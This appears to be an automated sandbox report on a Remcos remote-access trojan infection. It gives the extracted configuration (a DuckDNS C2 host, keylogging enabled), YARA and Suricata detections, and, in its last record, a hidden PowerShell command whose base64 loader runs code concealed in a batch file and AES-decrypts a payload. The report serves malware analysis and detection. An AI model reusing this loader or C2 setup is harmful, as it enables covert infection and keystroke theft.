Source: 15.2.powershell.exe.8da1288.5.raw.unpack |
Malware Configuration Extractor: Remcos {"Host:Port:Password": ["idonetire.duckdns.org:60735:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JSVSVI", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"} |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000027.00000002.2882266022.000000000C028000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001A.00000002.2040616405.000000000ADA8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001F.00000002.2550254218.000000000A8F8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001A.00000002.1806892725.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1546112824.00000000077A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001F.00000002.2303557593.0000000006DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1549446860.0000000008710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002C.00000002.2858524631.0000000008418000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000002.1719709803.00000000072B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002C.00000002.2839073220.0000000007DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000002.1780758184.000000000ADE8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.2433999584.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001F.00000002.2365827222.0000000007CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000002.2080417610.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001A.00000002.1944611268.000000000723A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR |
Source: Yara match |
File source: C:\ProgramData\remcos\logs.dat, type: DROPPED |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR |
Source: C:\Windows\System32\cmd.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\ |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
File opened: C:\Users\user\AppData\ |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\ |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
File opened: C:\Users\user\ |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
File opened: C:\Users\user\AppData\Roaming\ |
Jump to behavior |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49732 -> 37.120.208.37:60735 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49735 -> 37.120.208.37:60735 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49736 -> 37.120.208.37:60735 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49733 -> 37.120.208.37:60735 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49721 -> 37.120.208.37:60735 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49738 -> 37.120.208.37:60735 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49737 -> 37.120.208.37:60735 |
Source: Network traffic |
Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49739 -> 37.120.208.37:60735 |
Source: global traffic |
TCP traffic: 37.120.208.37 ports 0,60735,3,5,6,7 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: powershell.exe, 00000031.00000002.2917758631.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://.) |
Source: powershell.exe, 00000015.00000002.1719709803.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2080417610.0000000002E20000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 0000001F.00000002.2303557593.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microg |
Source: powershell.exe, 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000015.00000002.1780758184.000000000ADED000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.2040616405.000000000ADAD000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001F.00000002.2550254218.000000000A8FD000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000027.00000002.2882266022.000000000C02D000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002C.00000002.2858524631.000000000841D000.00000002.10000000.00040000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp/C |
Source: powershell.exe, 0000000F.00000002.1532865165.0000000005121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1670295072.0000000004A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1809680380.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1959478672.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2094746047.0000000004B05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2274343065.0000000004855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2462516754.0000000004635000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000F.00000002.1532865165.0000000005121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1670295072.0000000004A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1809680380.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1959478672.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2094746047.0000000004B05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2274343065.0000000004855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2462516754.0000000004635000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000027.00000002.2882266022.000000000C028000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001A.00000002.2040616405.000000000ADA8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001F.00000002.2550254218.000000000A8F8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001A.00000002.1806892725.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1546112824.00000000077A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001F.00000002.2303557593.0000000006DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1549446860.0000000008710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002C.00000002.2858524631.0000000008418000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000002.1719709803.00000000072B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002C.00000002.2839073220.0000000007DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000015.00000002.1780758184.000000000ADE8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.2433999584.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001F.00000002.2365827222.0000000007CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000027.00000002.2080417610.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000001A.00000002.1944611268.000000000723A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR |
Source: Yara match |
File source: C:\ProgramData\remcos\logs.dat, type: DROPPED |
Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE |
Matched rule: REMCOS_RAT_variants Author: unknown |
Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE |
Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen |
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: REMCOS_RAT_variants Author: unknown |
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen |
Source: 0000000F.00000002.1552419093.000000000A0BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 0000001F.00000002.2512708434.0000000009DFA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000027.00000002.2774707860.000000000B043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000015.00000002.1740439060.00000000098E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 0000002C.00000002.2858524631.000000000841D000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 0000001F.00000002.2373508321.0000000008C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000027.00000002.2882266022.000000000C02D000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 0000000F.00000002.1568471342.000000000A7A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 0000001A.00000002.2040616405.000000000ADAD000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 0000000F.00000002.1572745372.000000000AB3A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 0000001F.00000002.2550254218.000000000A8FD000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 00000015.00000002.1780758184.000000000ADED000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: 0000001A.00000002.1977944818.000000000914B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhc |